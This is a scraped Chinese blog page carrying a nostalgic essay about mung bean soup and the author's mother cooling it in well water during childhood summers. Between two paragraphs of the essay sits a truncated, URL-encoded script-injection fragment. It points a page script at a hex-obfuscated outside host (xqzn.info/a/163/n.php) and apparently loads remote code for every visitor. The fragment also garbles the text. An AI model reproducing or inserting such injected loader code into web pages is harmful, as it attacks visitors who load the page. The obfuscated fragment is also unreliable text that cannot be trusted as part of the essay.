注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

天天蓝a

为草甘做兰,为木当作松,幽兰香飘远,松寒不改容。

 
 
 

日志

 
 

绿豆汤  

2010-07-17 18:05:25|  分类: 讲述 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
 

酷暑的日子,人的口味渐渐习惯清淡。这时候,大家会买些冰棍、可乐、西瓜解渴降暑。但是,口味不同的冰棒,甜腻甜腻的并不解渴。西瓜吃多了胀肚子。相对而言,绿豆汤是夏天我最喜爱的饮品。
    一提起绿豆汤,首先它的名字就十分吸引眼球。绿,让我想到的是树阴,是凉爽;是微风,是娇柔……青绿的小豆呀,捧在手里,宛如诗意,绿豆汤虽没有如今超市里琳琅满目的饮料,没有各式各样的冷饮雪糕,但母亲熬的绿豆汤灿烂了我的童年生活。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<那时,物质匮乏,家境贫寒。一到盛夏酷暑的季节,母亲给我们消暑的就是绿豆汤。每天,早早起床的母亲在用自家种的绿豆熬汤。待我们起床时,绿豆汤已经放在冰凉的井水里散热。一天当中,母亲还不时地记着换换凉水。每当我们这些顽皮的孩子从外面疯回来时,母亲总会盛一碗绿豆汤,让我们快喝,说消消暑。如今年龄大了,工作了,每天吃饭,在满嘴芬芳中渐渐失去了喝绿豆汤的兴趣。

而在今年夏天的一个早晨,我回到父母家,发现母亲已把绿豆洗净,加水在高压锅里大火煮着。室外是一波又一波的热浪,而厨房锅内的绿豆也在沸水里翻腾,好似无数的绿色精灵正上演“凤凰涅盘”的精美大戏。渐渐,绿豆与水在不断磨合中达成某种默契,它绽开出花朵一般的笑颜,一朵又一朵美丽的绿豆花儿在水里漾着……

“好长时间不煮了,今天你们姐弟都回家,我得煮一大锅让你们喝个痛快”母亲微笑的说着,她布满皱纹的额头不住的流着汗水。我立即拿来毛巾。而母亲向我连连摆手,“出出汗,心里舒坦”

酥软,温顺,豆中沁水,水中沁豆,再加点调味的冰糖,摊冷。喝着老母亲亲手熬得绿豆汤,我会倍感亲切,因为这是一种家常的味道:恬静、舒心。

  评论这张
 
阅读(20)| 评论(3)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017